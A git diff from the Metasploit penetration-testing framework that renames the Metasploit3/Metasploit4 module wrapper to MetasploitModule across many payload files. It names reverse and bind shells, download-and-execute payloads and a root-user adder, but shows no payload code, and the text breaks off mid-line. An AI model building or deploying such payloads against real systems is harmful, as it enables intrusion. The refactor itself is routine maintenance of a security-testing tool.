a/modules/payloads/singles/cmd/unix/reverse_bash.rb b/modules/payloads/singles/cmd/unix/reverse_bash.rb index 381833bdb1..ff8f54d19b 100644 --- a/modules/payloads/singles/cmd/unix/reverse_bash.rb +++ b/modules/payloads/singles/cmd/unix/reverse_bash.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb index 6c10b6194c..f6ad174f4d 100644 --- a/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/unix/reverse_lua.rb b/modules/payloads/singles/cmd/unix/reverse_lua.rb index 95bbd8dd3c..32b84f8b9d 100644 --- a/modules/payloads/singles/cmd/unix/reverse_lua.rb +++ b/modules/payloads/singles/cmd/unix/reverse_lua.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 224 diff --git a/modules/payloads/singles/cmd/unix/reverse_netcat.rb b/modules/payloads/singles/cmd/unix/reverse_netcat.rb index 1c63d2d10b..1b45da190d 100644 --- a/modules/payloads/singles/cmd/unix/reverse_netcat.rb +++ b/modules/payloads/singles/cmd/unix/reverse_netcat.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb b/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb index 5040d2cba9..ed12e38ec8 100644 --- a/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb +++ b/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 35 diff --git a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb index 1d3dd09b0f..bbfba208ca 100644 --- a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb +++ b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 1971 diff --git a/modules/payloads/singles/cmd/unix/reverse_openssl.rb b/modules/payloads/singles/cmd/unix/reverse_openssl.rb index d89af6ad67..09e380f172 100644 --- a/modules/payloads/singles/cmd/unix/reverse_openssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_openssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_double_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 182 diff --git a/modules/payloads/singles/cmd/unix/reverse_perl.rb b/modules/payloads/singles/cmd/unix/reverse_perl.rb index 0aafd22aba..43b2e09835 100644 --- a/modules/payloads/singles/cmd/unix/reverse_perl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_perl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 234 diff --git a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb index 8e134bd9de..a948e187b5 100644 --- a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 144 diff --git a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb index 08a8f93942..b5ec5558ce 100644 --- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 132 diff --git a/modules/payloads/singles/cmd/unix/reverse_python.rb b/modules/payloads/singles/cmd/unix/reverse_python.rb index 4e9d7c6b5b..4712d0f048 100644 --- a/modules/payloads/singles/cmd/unix/reverse_python.rb +++ b/modules/payloads/singles/cmd/unix/reverse_python.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb index b1ab1b26f4..d5d07c0499 100644 --- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 587 diff --git a/modules/payloads/singles/cmd/unix/reverse_ruby.rb b/modules/payloads/singles/cmd/unix/reverse_ruby.rb index 502efcbb0c..229874d83a 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ruby.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ruby.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 133 diff --git a/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb index 009d0f00aa..5e14ec9289 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 185 diff --git a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb index bdf31d2045..38f2bcc93f 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_double_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 136 diff --git a/modules/payloads/singles/cmd/unix/reverse_zsh.rb b/modules/payloads/singles/cmd/unix/reverse_zsh.rb index 9127052406..2f168a313e 100644 --- a/modules/payloads/singles/cmd/unix/reverse_zsh.rb +++ b/modules/payloads/singles/cmd/unix/reverse_zsh.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 110 diff --git a/modules/payloads/singles/cmd/windows/adduser.rb b/modules/payloads/singles/cmd/windows/adduser.rb index 3a74d57100..dd34557f1e 100644 --- a/modules/payloads/singles/cmd/windows/adduser.rb +++ b/modules/payloads/singles/cmd/windows/adduser.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 97 diff --git a/modules/payloads/singles/cmd/windows/bind_lua.rb b/modules/payloads/singles/cmd/windows/bind_lua.rb index d9226dd894..493a4cb4e4 100644 --- a/modules/payloads/singles/cmd/windows/bind_lua.rb +++ b/modules/payloads/singles/cmd/windows/bind_lua.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 223 diff --git a/modules/payloads/singles/cmd/windows/bind_perl.rb b/modules/payloads/singles/cmd/windows/bind_perl.rb index 8f540f9a69..0525da8574 100644 --- a/modules/payloads/singles/cmd/windows/bind_perl.rb +++ b/modules/payloads/singles/cmd/windows/bind_perl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 139 diff --git a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb index 8bbf6d4845..6b6f946c45 100644 --- a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb +++ b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 140 diff --git a/modules/payloads/singles/cmd/windows/bind_ruby.rb b/modules/payloads/singles/cmd/windows/bind_ruby.rb index 9271e9df85..dbeaeba1c7 100644 --- a/modules/payloads/singles/cmd/windows/bind_ruby.rb +++ b/modules/payloads/singles/cmd/windows/bind_ruby.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 128 diff --git a/modules/payloads/singles/cmd/windows/download_eval_vbs.rb b/modules/payloads/singles/cmd/windows/download_eval_vbs.rb index 5d0e450c91..b9f1e41a93 100644 --- a/modules/payloads/singles/cmd/windows/download_eval_vbs.rb +++ b/modules/payloads/singles/cmd/windows/download_eval_vbs.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/windows/download_exec_vbs.rb b/modules/payloads/singles/cmd/windows/download_exec_vbs.rb index f70437fc6d..0f9ee789a3 100644 --- a/modules/payloads/singles/cmd/windows/download_exec_vbs.rb +++ b/modules/payloads/singles/cmd/windows/download_exec_vbs.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/cmd/windows/generic.rb b/modules/payloads/singles/cmd/windows/generic.rb index 047dc0bfc4..e97a3f57b1 100644 --- a/modules/payloads/singles/cmd/windows/generic.rb +++ b/modules/payloads/singles/cmd/windows/generic.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_shell' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 8 diff --git a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb index b33a5a6741..b047521eeb 100644 --- a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb +++ b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb @@ -9,7 +9,7 @@ require 'msf/base/sessions/powershell' require 'msf/core/payload/windows/powershell' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 1518 diff --git a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb index 5174312512..18701955de 100644 --- a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb +++ b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/base/sessions/powershell' require 'msf/core/payload/windows/powershell' require 'msf/core/handler/reverse_tcp_ssl' -module Metasploit3 +module MetasploitModule CachedSize = 1526 diff --git a/modules/payloads/singles/cmd/windows/reverse_lua.rb b/modules/payloads/singles/cmd/windows/reverse_lua.rb index fbe52645ad..8fb40e10d1 100644 --- a/modules/payloads/singles/cmd/windows/reverse_lua.rb +++ b/modules/payloads/singles/cmd/windows/reverse_lua.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 224 diff --git a/modules/payloads/singles/cmd/windows/reverse_perl.rb b/modules/payloads/singles/cmd/windows/reverse_perl.rb index ff007384f0..9b6eefe03a 100644 --- a/modules/payloads/singles/cmd/windows/reverse_perl.rb +++ b/modules/payloads/singles/cmd/windows/reverse_perl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 148 diff --git a/modules/payloads/singles/cmd/windows/reverse_powershell.rb b/modules/payloads/singles/cmd/windows/reverse_powershell.rb index 510f4b5df5..eb6bd4c53b 100644 --- a/modules/payloads/singles/cmd/windows/reverse_powershell.rb +++ b/modules/payloads/singles/cmd/windows/reverse_powershell.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 1204 diff --git a/modules/payloads/singles/cmd/windows/reverse_ruby.rb b/modules/payloads/singles/cmd/windows/reverse_ruby.rb index fa61454995..056283fb95 100644 --- a/modules/payloads/singles/cmd/windows/reverse_ruby.rb +++ b/modules/payloads/singles/cmd/windows/reverse_ruby.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 126 diff --git a/modules/payloads/singles/firefox/exec.rb b/modules/payloads/singles/firefox/exec.rb index 9f3dcbc1d5..782ed8627d 100644 --- a/modules/payloads/singles/firefox/exec.rb +++ b/modules/payloads/singles/firefox/exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 1019 diff --git a/modules/payloads/singles/firefox/shell_bind_tcp.rb b/modules/payloads/singles/firefox/shell_bind_tcp.rb index ce5b678d01..450a54ed7a 100644 --- a/modules/payloads/singles/firefox/shell_bind_tcp.rb +++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp.rb b/modules/payloads/singles/firefox/shell_reverse_tcp.rb index 3b007df865..4f9ad61ee7 100644 --- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb +++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/generic/custom.rb b/modules/payloads/singles/generic/custom.rb index 8c8a6569fc..943b202789 100644 --- a/modules/payloads/singles/generic/custom.rb +++ b/modules/payloads/singles/generic/custom.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/payload/generic' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/generic/debug_trap.rb b/modules/payloads/singles/generic/debug_trap.rb index 53411e9495..10afe263d7 100644 --- a/modules/payloads/singles/generic/debug_trap.rb +++ b/modules/payloads/singles/generic/debug_trap.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/payload/generic' -module Metasploit3 +module MetasploitModule CachedSize = 1 diff --git a/modules/payloads/singles/generic/shell_bind_tcp.rb b/modules/payloads/singles/generic/shell_bind_tcp.rb index 1f321f1d87..08d92ec255 100644 --- a/modules/payloads/singles/generic/shell_bind_tcp.rb +++ b/modules/payloads/singles/generic/shell_bind_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/payload/generic' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/generic/shell_reverse_tcp.rb b/modules/payloads/singles/generic/shell_reverse_tcp.rb index 20492e6537..f1fe1097fe 100644 --- a/modules/payloads/singles/generic/shell_reverse_tcp.rb +++ b/modules/payloads/singles/generic/shell_reverse_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/payload/generic' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/generic/tight_loop.rb b/modules/payloads/singles/generic/tight_loop.rb index c689218a3a..3ca11012b8 100644 --- a/modules/payloads/singles/generic/tight_loop.rb +++ b/modules/payloads/singles/generic/tight_loop.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/payload/generic' -module Metasploit3 +module MetasploitModule CachedSize = 2 diff --git a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb index 517cd5aaf5..fe0c9b1342 100644 --- a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb +++ b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 1593 diff --git a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb index e5201b9a61..a9118aa542 100644 --- a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb +++ b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 1501 diff --git a/modules/payloads/singles/java/shell_reverse_tcp.rb b/modules/payloads/singles/java/shell_reverse_tcp.rb index 5f760639e2..8a8cd0645a 100644 --- a/modules/payloads/singles/java/shell_reverse_tcp.rb +++ b/modules/payloads/singles/java/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 7359 diff --git a/modules/payloads/singles/linux/armle/adduser.rb b/modules/payloads/singles/linux/armle/adduser.rb index d8b72f2391..7bee064a1a 100644 --- a/modules/payloads/singles/linux/armle/adduser.rb +++ b/modules/payloads/singles/linux/armle/adduser.rb @@ -14,7 +14,7 @@ require 'msf/core' # Adds a UID 0 user to /etc/passwd. # ### -module Metasploit3 +module MetasploitModule CachedSize = 119 diff --git a/modules/payloads/singles/linux/armle/exec.rb b/modules/payloads/singles/linux/armle/exec.rb index 88c3f9e5b9..30f6a53e8d 100644 --- a/modules/payloads/singles/linux/armle/exec.rb +++ b/modules/payloads/singles/linux/armle/exec.rb @@ -13,7 +13,7 @@ require 'msf/core' # Executes an arbitrary command. # ### -module Metasploit3 +module MetasploitModule CachedSize = 29 diff --git a/modules/payloads/singles/linux/armle/shell_bind_tcp.rb b/modules/payloads/singles/linux/armle/shell_bind_tcp.rb index deac8e58a1..3f0721ce5d 100644 --- a/modules/payloads/singles/linux/armle/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/armle/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 208 diff --git a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb index 286b9c043e..a1f555ed66 100644 --- a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 172 diff --git a/modules/payloads/singles/linux/mipsbe/exec.rb b/modules/payloads/singles/linux/mipsbe/exec.rb index 0d7f26d720..4a68161bce 100644 --- a/modules/payloads/singles/linux/mipsbe/exec.rb +++ b/modules/payloads/singles/linux/mipsbe/exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 52 diff --git a/modules/payloads/singles/linux/mipsbe/reboot.rb b/modules/payloads/singles/linux/mipsbe/reboot.rb index f245836ec6..c0f93f5b2e 100644 --- a/modules/payloads/singles/linux/mipsbe/reboot.rb +++ b/modules/payloads/singles/linux/mipsbe/reboot.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 32 diff --git a/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb b/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb index f904e76eaf..e196576a12 100644 --- a/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 232 diff --git a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb index 36692d22dc..d1562f9cc4 100644 --- a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 184 diff --git a/modules/payloads/singles/linux/mipsle/exec.rb b/modules/payloads/singles/linux/mipsle/exec.rb index a2b1440a21..431b992815 100644 --- a/modules/payloads/singles/linux/mipsle/exec.rb +++ b/modules/payloads/singles/linux/mipsle/exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 52 diff --git a/modules/payloads/singles/linux/mipsle/reboot.rb b/modules/payloads/singles/linux/mipsle/reboot.rb index c479778455..bb93cdf2e0 100644 --- a/modules/payloads/singles/linux/mipsle/reboot.rb +++ b/modules/payloads/singles/linux/mipsle/reboot.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 32 diff --git a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb index 4beb549cac..81961f8a90 100644 --- a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 232 diff --git a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb index 6d240561fa..74fa0975ed 100644 --- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 184 diff --git a/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb b/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb index fe9f16e824..6769b0623b 100644 --- a/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 223 diff --git a/modules/payloads/singles/linux/ppc/shell_find_port.rb b/modules/payloads/singles/linux/ppc/shell_find_port.rb index 32c5f401bb..2f12236ae8 100644 --- a/modules/payloads/singles/linux/ppc/shell_find_port.rb +++ b/modules/payloads/singles/linux/ppc/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 171 diff --git a/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb index 01c5f74c98..a883f94dfa 100644 --- a/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 183 diff --git a/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb b/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb index d460648361..d9d755c37e 100644 --- a/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 223 diff --git a/modules/payloads/singles/linux/ppc64/shell_find_port.rb b/modules/payloads/singles/linux/ppc64/shell_find_port.rb index 61a29a463f..57ea9cd295 100644 --- a/modules/payloads/singles/linux/ppc64/shell_find_port.rb +++ b/modules/payloads/singles/linux/ppc64/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 171 diff --git a/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb index a3ef4a702e..d838d9f724 100644 --- a/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 183 diff --git a/modules/payloads/singles/linux/x64/exec.rb b/modules/payloads/singles/linux/x64/exec.rb index 69630f74bf..f42e589589 100644 --- a/modules/payloads/singles/linux/x64/exec.rb +++ b/modules/payloads/singles/linux/x64/exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 47 diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb index 06ab4b7e5c..c7a2765330 100644 --- a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 86 diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb index 7eaffef23f..07073dfe83 100644 --- a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb +++ b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 57 diff --git a/modules/payloads/singles/linux/x64/shell_find_port.rb b/modules/payloads/singles/linux/x64/shell_find_port.rb index 1ef8911778..9fc74d4381 100644 --- a/modules/payloads/singles/linux/x64/shell_find_port.rb +++ b/modules/payloads/singles/linux/x64/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 91 diff --git a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb index 860826c427..2b70a9dd60 100644 --- a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 